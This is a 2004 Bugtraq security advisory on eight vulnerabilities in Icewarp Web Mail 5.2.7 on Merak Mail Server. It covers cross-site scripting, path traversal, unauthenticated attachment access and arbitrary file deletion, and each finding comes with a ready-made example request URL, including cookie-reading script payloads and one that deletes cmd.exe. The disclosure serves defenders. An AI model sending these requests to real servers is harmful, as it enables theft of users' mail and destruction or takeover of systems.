[prev in list] [next in list] [prev in thread] [next in thread]
List: bugtraq
Subject: Multiple vulnerabilities in Icewarp Web Mail 5.2.7
From: ShineShadow <ss_contacts () hotmail ! com>
Date: 2004-09-10 16:30:33
Message-ID: 20040910163033.27745.qmail () www ! securityfocus ! com
[Download RAW message or body]
ShineShadow Security Report 10092004-01
TITLE: Multiple vulnerabilities in Icewarp Web Mail 5.2.7
BACKGROUND
Merak Mail Server, with the revolutionary Merak Mail Server GroupWare Server, \
cutting-edge Merak Mail Server Instant Antispam and much more, is the fastest, most \
stable, secure and 100% virus free mail server on the market today. Every day \
companies choose Merak Mail Server's stability, speed, security, functionality, \
scalability and multi-tiered delegated manageability over products costing thousands \
of dollars more yet lacking the sophistication that Merak delivers. In less than 10 \
minutes you can have the same professional email server that organizations such as \
NATO, the U.S. Navy, the FBI, Toyota, the U.S. Government, and many ISP Providers and \
Developers depend on every day.
Source: www.MerakMailServer.com (official web-site)
VULNERABLE PRODUCTS
MERAK Mail Server 7.4.5 with Icewarp Web Mail 5.2.7 (maybe earlier also vulnerable). \
MERAK Mail Server 7.5.2 with Icewarp Web Mail 5.2.8 is vulnerable to vulnerability \
#5.
DETAILS
1.Multiple cross-site scripting (XSS) vulnerabilities.
Active session required: YES
Description: Remote user, who HAS active session on Merak Mail Server, can execute \
cross-site scripting (XSS) attack. It could be used for executing malicious code in \
web browsers of other users.
Vulnerable pages:
accountsettings.html
search.html
Examples:
http:// [targethost]:32000/mail/accountsettings.html->Add->”Account \
name”,”Incoming mail server”,”User name” = \
<script> alert(document.cookie) </script> http:// \
[targethost]:32000/mail/search.html->”Search string” = <script> \
alert(document.cookie) </script>
2.Arbitrary directories creation on target system.
Active session required: NO
Description: Remote user, who HASN'T active session on Merak Mail Server, can create \
arbitrary directories on local file system of the target. It could be used during \
attack on an affected system.
Vulnerable pages: viewaction.html
Example:
http://[targethost]:32000/mail/viewaction.html?Move_x=1&user=../../hacker
3. Full install path disclosure.
Active session required: NO
Description: Remote user, who HASN'T active session on Merak Mail Server, can \
disclosure full install path of Merak Mail Server. It could be used during attack on \
an affected system.
Vulnerable pages:
accountsettings_add.html
topmenu.html
Examples:
http://[target host]:32000/mail/accountsettings_add.html
http://[target host]:32000/mail/topmenu.html
4.Viewing or downloading arbitrary attachments.
Active session required: NO
Description:Remote user, who HASN'T active session on Merak Mail Server, can access \
to attachments of any user. It could be used for access to personal information of \
other users.
Vulnerable pages: attachment.html
Example:
http://[targethost]:32000/mail/attachment.html?user=merakdemo.com/admin&messageid=20040801&index=3&folder=inbox
5.Creating text file with arbitrary content.
Active session required: YES
Description: Remote user, who HAS active session on Merak Mail Server, can create \
text file on Merak Mail Server with arbitrary content (include special characters). \
Name of file will be accounts.dat. Combining this vulnerability with vulnerability #8 \
attacker could executed arbitrary PHP code and take complete control of an affected \
system.
Vulnerable pages: accountsettings_add.html
Example:
http://[targethost]:32000/mail/accountsettings_add.html?id=[sessionid]&Save_x=1&accoun \
t[EMAIL]=hacker&account[HOST]=blackhat.org&account[HOSTUSER]=hacker&account[HOSTPASS]=31337&account[HOSTPASS2]=31337&accountid=[any \
text with special characters]
Note: MERAK Mail Server 7.5.2 with Icewarp Mail Server 5.2.8 also vulnerable to it.
6. Arbitrary files deletion on target system.
Active session required: NO
Description: Remote user, who HASN'T active session on Merak Mail Server, can delete \
arbitrary files on local file system of the target. It could be used for deleting any \
data on an affected system or causing denial of service (DOS) conditions.
Vulnerable pages: viewaction.html
Example:
http://[targethost]:32000/mail/viewaction.html?messageid=cmd.exe&action=delete&originalfolder=c:/winnt/system32
7. Moving arbitrary files or directories on target system.
Active session required: NO
Description: Remote user, who HASN'T active session on Merak Mail Server, can moving \
arbitrary files or directories on local file system of the target. It could be used \
for causing denial of service (DOS) conditions or access to arbitrary files on \
affected system.
Vulnerable pages: viewaction.html
Example:
http://[targethost]:32000/mail/viewaction.html?messageid=....//....//config/settings.c \
fg&Move_x=1&originalfolder=c:/Program%20Files/Merak/html/mail&user=../../html/mail
8. Renaming arbitrary files or directories on target system.
Active session required: YES
Description: Remote user, who HAS active session on Merak Mail Server, can renaming \
arbitrary files or directories on local file system of the target. Moving files or \
directories also possible. It could be used for causing denial of service (DOS) \
conditions or access to arbitrary files on affected system.
Vulnerable pages: folders.html
Example:
http://[targethost]:32000/mail/folders.html?id=[sessionid]&folderold=....//....//..../ \
/….//….//winnt&folder=....//....//....//….//….//linux&Save_x=1
EXPLOITATION
IceWarp Web Mail (CONTROL service) must be running on Merak Mail Server (default \
ENABLE). Only web browser is needed for exploitation of this vulnerabilities.
WORKAROUND
Upgrade to MERAK Mail Server 7.5.2 with Icewarp Web Mail 5.2.8 or higher. Disabling \
of Icewarp Web Mail service (Control.exe) also possible.
VENDOR STATUS
Vendor has been contacted on August 6th for this and some other vulnerabilities (not \
described in this report). No response, but new version of the product (MERAK Mail \
Server 7.5.2 with Icewarp Web Mail 5.2.8) has been released August, 12th. NOT ALL \
REPORTED VULNERABILITIES HAS BEEN FIXED IN ICEWARP WEB MAIL 5.2.8.
SUMMARY
An attacker who successfully exploited vulnerabilities described in this report could \
take complete control of a Merak Mail Server 7.4.5 or an affected remote system. \
Icewarp Web Mail 5.2.8 also vulnerable to other (undescribed in this report) critical \
vulnerabilities. An attacker who successfully exploited of this undescribed \
vulnerabilities could take complete control of a Merak Mail Server 7.5.2 or an \
affected remote system. I’m not advice to use this product, you must disable \
Icewarp Web Mail service.
CREDITS
ShineShadow, undependent computer security expert.
To get more information, please contact me by e-mail.
10.09.2004
ShineShadow,
ss_contacts@hotmail.com
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic